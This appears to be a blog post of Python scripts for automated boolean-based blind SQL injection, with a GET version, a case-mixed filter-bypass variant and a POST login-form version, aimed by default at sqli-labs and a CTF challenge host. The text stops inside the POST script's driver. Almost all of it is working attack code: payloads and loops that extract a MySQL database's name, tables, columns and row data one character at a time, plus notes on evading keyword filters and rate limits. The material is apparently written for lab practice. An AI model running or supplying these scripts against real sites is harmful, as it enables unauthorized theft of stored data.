Python脚本-布尔盲注与时间盲注(GET/POST 四个版本)

BlindBool_get

import requests
from optparse import OptionParser
import threading

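# Scan results live in module globals so StartSqli can present them.
DBName = ""       # current database name, filled in by GetDBName
DBTables = []     # table names of DBName, filled in by GetDBTables
DBColumns = []    # column names of the chosen table, filled in by GetDBColumns
DBData = {}       # column name -> list of dumped values, filled in by GetDBData
# Substring whose presence in the response marks a "true" page for the oracle.
flag = 'You are in'
# One session for the whole scan.  The original assigned
# requests.adapters.DEFAULT_RETRIES and conn.keep_alive; neither has any
# effect (HTTPAdapter binds its retry default when __init__ is defined, and
# Session has no keep_alive attribute), so the "Max retries exceeded with url"
# problem it meant to address was not actually mitigated.  Mounting an adapter
# with max_retries and sending Connection: close does the intended thing:
# failed connections are retried and each request closes its connection.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount('http://', _adapter)
conn.mount('https://', _adapter)
conn.headers['Connection'] = 'close'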

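def GetDBName(url):
    """Recover the current database name with boolean-based blind injection.

    Each probe is ``url`` with a payload appended; the page counts as "true"
    when the module-level ``flag`` string appears in the body.  The name is
    accumulated into the module-level ``DBName`` one character at a time.

    Args:
        url: target URL ending in the injectable parameter value, e.g.
            ``http://host/?id=1``.

    Raises:
        RuntimeError: if no length in 1..98 makes the oracle true -- wrong
            injection point, wrong ``flag`` or a filtered payload.  The
            original silently continued with a bogus length of 98.
    """
    global DBName

    def oracle(target):
        # timeout: one hung connection must not stall the whole scan.
        # errors="replace": a non-UTF-8 page must not abort the loop.
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print('[*]开始获取数据库名长度')
    length_url = url + "' and if(length(database())={0},1,0) --+"
    for DBNameLen in range(1, 99):
        if oracle(length_url.format(DBNameLen)):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    else:
        raise RuntimeError("database name length not found: check url and flag")

    print("[*]开始获取数据库名")
    char_url = url + "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"
    for pos in range(1, DBNameLen + 1):
        for code in range(33, 128):
            if oracle(char_url.format(pos, code)):
                DBName += chr(code)
                break
        else:
            # Nothing in printable ASCII matched (non-ASCII byte or filtered
            # request); keep a placeholder so later positions stay aligned.
            DBName += "?"
            print("[!]第{0}位未匹配到可打印字符".format(pos))
        print("[*]" + DBName)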

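def GetDBTables(url, dbname):
    """Enumerate the table names of schema ``dbname`` into ``DBTables``.

    Three stages through the boolean oracle (``flag`` in the response body):
    the table count, then per index the name length, then each character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema to enumerate.  It is spliced into the payload inside
            single quotes, so a name containing ``'`` would break the query.

    Raises:
        RuntimeError: if the table count or a table-name length is never
            confirmed by the oracle; the original silently went on with
            the loop's last value (99 / 98).
    """
    global DBTables

    def oracle(target):
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    count_url = url + "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"
    # Start at 0 so an empty schema is recognised instead of failing.
    for DBTableCount in range(0, 100):
        if oracle(count_url.format(dbname, DBTableCount)):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
            break
    else:
        raise RuntimeError("table count of {0} not found: check url and flag".format(dbname))

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    len_url = url + "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"
    char_url = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"
    for idx in range(DBTableCount):
        print("[*] 正在获取第{0}个表名".format(idx + 1))
        for tableLen in range(1, 99):
            if oracle(len_url.format(dbname, idx, tableLen)):
                break
        else:
            raise RuntimeError("length of table #{0} not found".format(idx + 1))
        table = ""
        for pos in range(1, tableLen + 1):
            for code in range(33, 128):
                if oracle(char_url.format(dbname, idx, pos, code)):
                    table += chr(code)
                    print(table)
                    break
            else:
                table += "?"  # no printable-ASCII match; keep positions aligned
        DBTables.append(table)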

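def GetDBColumns(url, dbname, dbtable):
    """Enumerate the column names of ``dbname.dbtable`` into ``DBColumns``.

    Same scheme as GetDBTables: column count, then per column its name
    length and each character, via the boolean oracle.

    Bug fixed: the character loop started at substr() position 0, which in
    MySQL yields '' (ascii 0) and can never match 33..127 -- 95 wasted
    requests per column.  substr() positions are 1-based.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema name, spliced into the payload inside single quotes.
        dbtable: table name, likewise spliced inside single quotes.

    Raises:
        RuntimeError: if the column count or a column-name length is never
            confirmed by the oracle.
    """
    global DBColumns

    def oracle(target):
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_url = url + "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"
    for DBColumnCount in range(0, 99):
        if oracle(count_url.format(dbname, dbtable, DBColumnCount)):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, DBColumnCount))
            break
    else:
        raise RuntimeError("column count of {0}.{1} not found".format(dbname, dbtable))

    len_url = url + "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"
    char_url = url + "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"
    for idx in range(DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(idx + 1))
        for columnLen in range(0, 99):
            if oracle(len_url.format(dbname, dbtable, idx, columnLen)):
                break
        else:
            raise RuntimeError("length of column #{0} not found".format(idx + 1))
        column = ""
        for pos in range(1, columnLen + 1):  # 1-based: position 0 never matches
            for code in range(33, 128):
                if oracle(char_url.format(dbname, dbtable, idx, pos, code)):
                    column += chr(code)
                    print(column)
                    break
            else:
                column += "?"
        DBColumns.append(column)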

# 获取表数据函数
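def GetDBData(url, dbtable, dbcolumn):
    """Dump every value of ``dbtable.dbcolumn`` into ``DBData[dbcolumn]``.

    Row count via ``count(column)``, then per row the value length and each
    character, via the boolean oracle (``flag`` in the response body).

    Args:
        url: target URL ending in the injectable parameter value.
        dbtable: table to read; spliced unquoted into the FROM clause.
        dbcolumn: column to read; spliced unquoted into the SELECT list.

    Notes:
        ``count(col)`` skips NULLs while ``limit n,1`` does not, so a NULL
        row never gets a confirmed length; it is stored as "" with a
        warning instead of the original's 98 x 95 wasted requests.
        Characters are searched in 32..127 so spaces inside values are
        recovered instead of being dropped.

    Raises:
        RuntimeError: if the row count is never confirmed by the oracle.
    """
    global DBData

    def oracle(target):
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_url = url + "'and if ((select count({0}) from {1})={2},1,0) --+"
    for DBDataCount in range(99):
        if oracle(count_url.format(dbcolumn, dbtable, DBDataCount)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    else:
        raise RuntimeError("row count of {0}.{1} not found".format(dbtable, dbcolumn))

    len_url = url + "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"
    char_url = url + "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"
    for row in range(DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        for dataLen in range(99):
            if oracle(len_url.format(dbcolumn, dbtable, row, dataLen)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, dataLen))
                break
        else:
            print("[!]第{0}个数据长度未确认(可能为NULL或超过98),按空值处理".format(row + 1))
            dataLen = 0
        data = ""
        for pos in range(1, dataLen + 1):
            for code in range(32, 128):
                if oracle(char_url.format(dbcolumn, dbtable, row, pos, code)):
                    data += chr(code)
                    print(data)
                    break
            else:
                data += "?"  # non-ASCII or filtered; keep positions aligned
        DBData.setdefault(dbcolumn, []).append(data)
        print(DBData)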

# 盲注主函数
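def StartSqli(url):
    """Interactive driver: database name -> tables -> columns -> column dump.

    Prompts on stdin for the table to inspect and then, repeatedly, for the
    column to dump (0 exits).  Works on the module-level result globals.

    Robustness over the original: a non-numeric or out-of-range answer is
    re-prompted instead of raising ValueError / IndexError, and 0 or a
    negative number at the table prompt no longer silently selects the last
    entry through negative indexing.
    """
    def ask(prompt, lowest, highest):
        # Re-prompt until the answer is an integer within [lowest, highest].
        while True:
            raw = input(prompt).strip()
            if raw.isdigit() and lowest <= int(raw) <= highest:
                return int(raw)
            print("[!]请输入{0}到{1}之间的整数".format(lowest, highest))

    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("(" + str(number) + ")" + name)
    if not DBTables:
        print("[!]未获取到任何表,结束")
        return
    tableIndex = ask("[*]请输入要查看表的序号:", 1, len(DBTables)) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for number, name in enumerate(DBColumns, 1):
            print("(" + str(number) + ")" + name)
        columnIndex = ask("[*]请输入要查看字段的序号(输入0退出):", 0, len(DBColumns)) - 1
        if columnIndex == -1:
            break
        GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])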

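if __name__ == "__main__":
    usage = "./BlindBool_get.py -u url"
    parser = OptionParser(usage)
    parser.add_option('-u', type='string', dest='url', default='http://localhost/Less-8/?id=1', help='设置目标url')
    options, args = parser.parse_args()
    # Run the scan in the main thread.  The original started it in a worker
    # thread: Ctrl-C is delivered to the main thread, which had already left
    # the try block after start(), so the handler never ran and the
    # non-daemon worker kept going; input() also ran off the main thread.
    try:
        StartSqli(options.url)
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')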

BlindBool_get-修改过的(大小写过滤)

import requests
from optparse import OptionParser
import threading
import time

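# Scan results live in module globals so StartSqli can present them.
DBName = ""       # current database name, filled in by GetDBName
DBTables = []     # table names of DBName, filled in by GetDBTables
DBColumns = []    # column names of the chosen table, filled in by GetDBColumns
DBData = {}       # column name -> list of dumped values, filled in by GetDBData
# Substring whose presence in the response marks a "true" page for the oracle;
# it is target specific (this variant was tuned for a page that says "points").
flag = 'points'
# One session for the whole scan.  The original assigned
# requests.adapters.DEFAULT_RETRIES and conn.keep_alive; neither has any
# effect (HTTPAdapter binds its retry default when __init__ is defined, and
# Session has no keep_alive attribute).  Mounting an adapter with max_retries
# and sending Connection: close does the intended thing: failed connections
# are retried and each request closes its connection.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount('http://', _adapter)
conn.mount('https://', _adapter)
conn.headers['Connection'] = 'close'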


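def GetDBName(url):
    """Recover the current database name with boolean-based blind injection.

    Variant with mixed-case keywords (to get past a case-sensitive keyword
    filter) and a 0.2 s pause before every probe.  The page counts as "true"
    when ``flag`` appears in the body; the name accumulates into ``DBName``.

    Args:
        url: target URL ending in the injectable parameter value.

    Raises:
        RuntimeError: if no length in 1..98 makes the oracle true (wrong
            injection point, wrong ``flag`` or a filtered payload).
    """
    global DBName

    def oracle(target):
        # Pause between probes: this target needs request spacing (see the
        # page's note about the interval); tune to the target's rate limit.
        time.sleep(0.2)
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print('[*]开始获取数据库名长度')
    length_url = url + "' AND if(length(database())={0},1,0) --+"
    for DBNameLen in range(1, 99):
        if oracle(length_url.format(DBNameLen)):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    else:
        raise RuntimeError("database name length not found: check url and flag")

    print("[*]开始获取数据库名")
    char_url = url + "' AND if(Ascii(Substr(Database(),{0},1))={1},1,0) --+"
    for pos in range(1, DBNameLen + 1):
        for code in range(33, 128):
            if oracle(char_url.format(pos, code)):
                DBName += chr(code)
                break
        else:
            # No printable-ASCII match; keep a placeholder so positions align.
            DBName += "?"
            print("[!]第{0}位未匹配到可打印字符".format(pos))
        print("[*]" + DBName)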


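def GetDBTables(url, dbname):
    """Enumerate the table names of schema ``dbname`` into ``DBTables``.

    Mixed-case payload variant with a 0.2 s pause per probe.  Stages: table
    count, then per index the name length, then each character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema to enumerate; spliced inside single quotes.

    Raises:
        RuntimeError: if the table count or a name length is never confirmed
            by the oracle (the original went on with 99 / 98).
    """
    global DBTables

    def oracle(target):
        time.sleep(0.2)  # request spacing for this rate-limited target
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    count_url = url + "' And If((Select Count(*)Table_Name From InfOrmation_Schema.Tables Where Table_Schema='{0}')={1},1,0) --+"
    # Start at 0 so an empty schema is recognised instead of failing.
    for DBTableCount in range(0, 100):
        if oracle(count_url.format(dbname, DBTableCount)):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
            break
    else:
        raise RuntimeError("table count of {0} not found: check url and flag".format(dbname))

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    len_url = url + "' And if((Select LENGTH(Table_name) From infOrmation_schema.tables Where table_schema='{0}' limit {1},1)={2},1,0) --+"
    char_url = url + "' And if(Ascii(Substr((Select Table_name From infOrmation_schema.tables Where Table_schema = '{0}' Limit {1},1),{2},1))={3},1,0) --+"
    for idx in range(DBTableCount):
        print("[*] 正在获取第{0}个表名".format(idx + 1))
        for tableLen in range(1, 99):
            if oracle(len_url.format(dbname, idx, tableLen)):
                break
        else:
            raise RuntimeError("length of table #{0} not found".format(idx + 1))
        table = ""
        for pos in range(1, tableLen + 1):
            for code in range(33, 128):
                if oracle(char_url.format(dbname, idx, pos, code)):
                    table += chr(code)
                    print(table)
                    break
            else:
                table += "?"  # no printable-ASCII match; keep positions aligned
        DBTables.append(table)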


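def GetDBColumns(url, dbname, dbtable):
    """Enumerate the column names of ``dbname.dbtable`` into ``DBColumns``.

    Upper-case payload variant with a 0.2 s pause per probe.

    Bug fixed: the character loop started at SUBSTR() position 0, which in
    MySQL yields '' (ascii 0) and can never match 33..127 -- 95 wasted
    requests per column.  SUBSTR() positions are 1-based.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema name, spliced inside single quotes.
        dbtable: table name, spliced inside single quotes.

    Raises:
        RuntimeError: if the column count or a name length is never
            confirmed by the oracle.
    """
    global DBColumns

    def oracle(target):
        time.sleep(0.2)  # request spacing for this rate-limited target
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_url = url + "' AND IF((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}')={2},1,0) --+"
    for DBColumnCount in range(0, 99):
        if oracle(count_url.format(dbname, dbtable, DBColumnCount)):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, DBColumnCount))
            break
    else:
        raise RuntimeError("column count of {0}.{1} not found".format(dbname, dbtable))

    len_url = url + "' AND IF((SELECT LENGTH(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}' LIMIT {2},1)={3},1,0) --+"
    char_url = url + "' AND IF(ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}' LIMIT {2},1),{3},1))={4},1,0) --+"
    for idx in range(DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(idx + 1))
        for columnLen in range(0, 99):
            if oracle(len_url.format(dbname, dbtable, idx, columnLen)):
                break
        else:
            raise RuntimeError("length of column #{0} not found".format(idx + 1))
        column = ""
        for pos in range(1, columnLen + 1):  # 1-based: position 0 never matches
            for code in range(33, 128):
                if oracle(char_url.format(dbname, dbtable, idx, pos, code)):
                    column += chr(code)
                    print(column)
                    break
            else:
                column += "?"
        DBColumns.append(column)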


# 获取表数据函数
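def GetDBData(url, dbtable, dbcolumn):
    """Dump every value of ``dbtable.dbcolumn`` into ``DBData[dbcolumn]``.

    Upper-case payload variant with a 0.2 s pause per probe.  Row count via
    ``COUNT(column)``, then per row the value length and each character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbtable: table to read; spliced unquoted into the FROM clause.
        dbcolumn: column to read; spliced unquoted into the SELECT list.

    Notes:
        ``COUNT(col)`` skips NULLs while ``LIMIT n,1`` does not, so a NULL
        row never gets a confirmed length; it is stored as "" with a warning
        instead of burning 98 x 95 requests.  Characters are searched in
        32..127 so spaces inside values are recovered.

    Raises:
        RuntimeError: if the row count is never confirmed by the oracle.
    """
    global DBData

    def oracle(target):
        time.sleep(0.2)  # request spacing for this rate-limited target
        res = conn.get(target, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_url = url + "'AND IF ((SELECT COUNT({0}) FROM {1})={2},1,0) --+"
    for DBDataCount in range(99):
        if oracle(count_url.format(dbcolumn, dbtable, DBDataCount)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    else:
        raise RuntimeError("row count of {0}.{1} not found".format(dbtable, dbcolumn))

    len_url = url + "'AND IF ((SELECT LENGTH({0}) FROM {1} LIMIT {2},1)={3},1,0) --+"
    char_url = url + "'AND IF (ASCII(SUBSTR((SELECT {0} FROM {1} LIMIT {2},1),{3},1))={4},1,0) --+"
    for row in range(DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        for dataLen in range(99):
            if oracle(len_url.format(dbcolumn, dbtable, row, dataLen)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, dataLen))
                break
        else:
            print("[!]第{0}个数据长度未确认(可能为NULL或超过98),按空值处理".format(row + 1))
            dataLen = 0
        data = ""
        for pos in range(1, dataLen + 1):
            for code in range(32, 128):
                if oracle(char_url.format(dbcolumn, dbtable, row, pos, code)):
                    data += chr(code)
                    print(data)
                    break
            else:
                data += "?"  # non-ASCII or filtered; keep positions aligned
        DBData.setdefault(dbcolumn, []).append(data)
        print(DBData)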


# 盲注主函数
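def StartSqli(url):
    """Interactive driver: database name -> tables -> columns -> column dump.

    Prompts on stdin for the table to inspect and then, repeatedly, for the
    column to dump (0 exits).  Works on the module-level result globals.

    Robustness over the original: a non-numeric or out-of-range answer is
    re-prompted instead of raising ValueError / IndexError, and 0 or a
    negative number at the table prompt no longer silently selects the last
    entry through negative indexing.
    """
    def ask(prompt, lowest, highest):
        # Re-prompt until the answer is an integer within [lowest, highest].
        while True:
            raw = input(prompt).strip()
            if raw.isdigit() and lowest <= int(raw) <= highest:
                return int(raw)
            print("[!]请输入{0}到{1}之间的整数".format(lowest, highest))

    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("(" + str(number) + ")" + name)
    if not DBTables:
        print("[!]未获取到任何表,结束")
        return
    tableIndex = ask("[*]请输入要查看表的序号:", 1, len(DBTables)) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for number, name in enumerate(DBColumns, 1):
            print("(" + str(number) + ")" + name)
        columnIndex = ask("[*]请输入要查看字段的序号(输入0退出):", 0, len(DBColumns)) - 1
        if columnIndex == -1:
            break
        GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])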


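if __name__ == "__main__":
    usage = "./BlindBool_get.py -u url"
    parser = OptionParser(usage)
    parser.add_option('-u', type='string', dest='url',
                      default='http://ad508a79-8b81-4227-bc6f-37d173ce8209.node4.buuoj.cn:81/?id=TMP0919',
                      help='设置目标url')
    options, args = parser.parse_args()
    # Run the scan in the main thread.  The original started it in a worker
    # thread: Ctrl-C is delivered to the main thread, which had already left
    # the try block after start(), so the handler never ran and the
    # non-daemon worker kept going; input() also ran off the main thread.
    try:
        StartSqli(options.url)
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')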

相对 BlindBool_get 修改的地方:

payload:SQL 关键字改为大小写混写(如 And、InfOrmation_Schema、SUBSTR),用于绕过只按固定大小写匹配关键字的过滤
flag:改为目标页面仅在条件为真时出现的字符串("points");使用前需先手工对比真/假两种响应确定该字符串
添加了 time.sleep(0.2):每次请求前暂停 0.2 秒,避免请求过快触发目标的频率限制或连接被拒绝
default:-u 的默认目标 url 改为题目环境地址
修改时要注意间隔:sleep 的时长要按目标的限速情况调整——过小会被限速/拒绝,过大则每个字符至多 95 次请求会让整个盲注过程明显变慢

BlindBool_post

import requests
from optparse import OptionParser
import threading

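# Scan results live in module globals so StartSqli can present them.
DBName = ""       # current database name, filled in by GetDBName
DBTables = []     # table names of DBName, filled in by GetDBTables
DBColumns = []    # column names of the chosen table, filled in by GetDBColumns
DBData = {}       # column name -> list of dumped values, filled in by GetDBData
# Substring whose presence in the response marks a "true" page for the oracle.
flag = 'flag'
# One session for the whole scan.  The original assigned
# requests.adapters.DEFAULT_RETRIES and conn.keep_alive; neither has any
# effect (HTTPAdapter binds its retry default when __init__ is defined, and
# Session has no keep_alive attribute).  Mounting an adapter with max_retries
# and sending Connection: close does the intended thing: failed connections
# are retried and each request closes its connection.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount('http://', _adapter)
conn.mount('https://', _adapter)
conn.headers['Connection'] = 'close'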

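def GetDBName(url):
    """Recover the current database name via a boolean-blind POST injection.

    The payload is sent in the login form's ``uname`` field; ``passwd`` and
    ``submit`` are fixed filler.  The page counts as "true" when ``flag``
    appears in the body; the name accumulates into ``DBName``.

    Args:
        url: form handler URL (e.g. ``http://host/Less-15``).

    Raises:
        RuntimeError: if no length in 1..98 makes the oracle true (wrong
            form field, wrong ``flag`` or a filtered payload).
    """
    global DBName

    def oracle(payload):
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        # timeout: one hung connection must not stall the whole scan.
        # errors="replace": a non-UTF-8 page must not abort the loop.
        res = conn.post(url, data=form, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print('[*]开始获取数据库名长度')
    length_payload = "admin' and if(length(database())={0},1,0) #"
    for DBNameLen in range(1, 99):
        if oracle(length_payload.format(DBNameLen)):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    else:
        raise RuntimeError("database name length not found: check url and flag")

    print("[*]开始获取数据库名")
    char_payload = "admin' and if(ascii(substr(database(),{0},1))={1},1,0) #"
    for pos in range(1, DBNameLen + 1):
        for code in range(33, 128):
            if oracle(char_payload.format(pos, code)):
                DBName += chr(code)
                break
        else:
            # No printable-ASCII match; keep a placeholder so positions align.
            DBName += "?"
            print("[!]第{0}位未匹配到可打印字符".format(pos))
        print("[*]" + DBName)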

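def GetDBTables(url, dbname):
    """Enumerate the table names of schema ``dbname`` into ``DBTables``.

    POST variant: each payload rides in the ``uname`` form field.  Stages:
    table count, then per index the name length, then each character.

    Args:
        url: form handler URL.
        dbname: schema to enumerate; spliced inside single quotes, so a
            name containing ``'`` would break the query.

    Raises:
        RuntimeError: if the table count or a name length is never confirmed
            by the oracle (the original went on with 99 / 98).
    """
    global DBTables

    def oracle(payload):
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        res = conn.post(url, data=form, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    count_payload = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) #"
    # Start at 0 so an empty schema is recognised instead of failing.
    for DBTableCount in range(0, 100):
        if oracle(count_payload.format(dbname, DBTableCount)):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
            break
    else:
        raise RuntimeError("table count of {0} not found: check url and flag".format(dbname))

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    len_payload = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) #"
    char_payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) #"
    for idx in range(DBTableCount):
        print("[*] 正在获取第{0}个表名".format(idx + 1))
        for tableLen in range(1, 99):
            if oracle(len_payload.format(dbname, idx, tableLen)):
                break
        else:
            raise RuntimeError("length of table #{0} not found".format(idx + 1))
        table = ""
        for pos in range(1, tableLen + 1):
            for code in range(33, 128):
                if oracle(char_payload.format(dbname, idx, pos, code)):
                    table += chr(code)
                    print(table)
                    break
            else:
                table += "?"  # no printable-ASCII match; keep positions aligned
        DBTables.append(table)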

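def GetDBColumns(url, dbname, dbtable):
    """Enumerate the column names of ``dbname.dbtable`` into ``DBColumns``.

    POST variant (payload in the ``uname`` form field).

    Bug fixed: the character loop started at substr() position 0, which in
    MySQL yields '' (ascii 0) and can never match 33..127 -- 95 wasted
    requests per column.  substr() positions are 1-based.

    Args:
        url: form handler URL.
        dbname: schema name, spliced inside single quotes.
        dbtable: table name, spliced inside single quotes.

    Raises:
        RuntimeError: if the column count or a name length is never
            confirmed by the oracle.
    """
    global DBColumns

    def oracle(payload):
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        res = conn.post(url, data=form, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) #"
    for DBColumnCount in range(0, 99):
        if oracle(count_payload.format(dbname, dbtable, DBColumnCount)):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, DBColumnCount))
            break
    else:
        raise RuntimeError("column count of {0}.{1} not found".format(dbname, dbtable))

    len_payload = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) #"
    char_payload = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) #"
    for idx in range(DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(idx + 1))
        for columnLen in range(0, 99):
            if oracle(len_payload.format(dbname, dbtable, idx, columnLen)):
                break
        else:
            raise RuntimeError("length of column #{0} not found".format(idx + 1))
        column = ""
        for pos in range(1, columnLen + 1):  # 1-based: position 0 never matches
            for code in range(33, 128):
                if oracle(char_payload.format(dbname, dbtable, idx, pos, code)):
                    column += chr(code)
                    print(column)
                    break
            else:
                column += "?"
        DBColumns.append(column)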

# 获取表数据函数
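def GetDBData(url, dbtable, dbcolumn):
    """Dump every value of ``dbtable.dbcolumn`` into ``DBData[dbcolumn]``.

    POST variant (payload in the ``uname`` form field).  Row count via
    ``count(column)``, then per row the value length and each character.

    Args:
        url: form handler URL.
        dbtable: table to read; spliced unquoted into the FROM clause.
        dbcolumn: column to read; spliced unquoted into the SELECT list.

    Notes:
        ``count(col)`` skips NULLs while ``limit n,1`` does not, so a NULL
        row never gets a confirmed length; it is stored as "" with a warning
        instead of burning 98 x 95 requests.  Characters are searched in
        32..127 so spaces inside values are recovered.

    Raises:
        RuntimeError: if the row count is never confirmed by the oracle.
    """
    global DBData

    def oracle(payload):
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        res = conn.post(url, data=form, timeout=10)
        return flag in res.content.decode("utf-8", errors="replace")

    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_payload = "admin' and if ((select count({0}) from {1})={2},1,0) #"
    for DBDataCount in range(99):
        if oracle(count_payload.format(dbcolumn, dbtable, DBDataCount)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    else:
        raise RuntimeError("row count of {0}.{1} not found".format(dbtable, dbcolumn))

    len_payload = "admin' and if ((select length({0}) from {1} limit {2},1)={3},1,0) #"
    char_payload = "admin' and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) #"
    for row in range(DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        for dataLen in range(99):
            if oracle(len_payload.format(dbcolumn, dbtable, row, dataLen)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, dataLen))
                break
        else:
            print("[!]第{0}个数据长度未确认(可能为NULL或超过98),按空值处理".format(row + 1))
            dataLen = 0
        value = ""
        for pos in range(1, dataLen + 1):
            for code in range(32, 128):
                if oracle(char_payload.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
            else:
                value += "?"  # non-ASCII or filtered; keep positions aligned
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)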

# 盲注主函数
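def StartSqli(url):
    """Interactive driver: database name -> tables -> columns -> column dump.

    Prompts on stdin for the table to inspect and then, repeatedly, for the
    column to dump (0 exits).  Works on the module-level result globals.

    Robustness over the original: a non-numeric or out-of-range answer is
    re-prompted instead of raising ValueError / IndexError, and 0 or a
    negative number at the table prompt no longer silently selects the last
    entry through negative indexing.
    """
    def ask(prompt, lowest, highest):
        # Re-prompt until the answer is an integer within [lowest, highest].
        while True:
            raw = input(prompt).strip()
            if raw.isdigit() and lowest <= int(raw) <= highest:
                return int(raw)
            print("[!]请输入{0}到{1}之间的整数".format(lowest, highest))

    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
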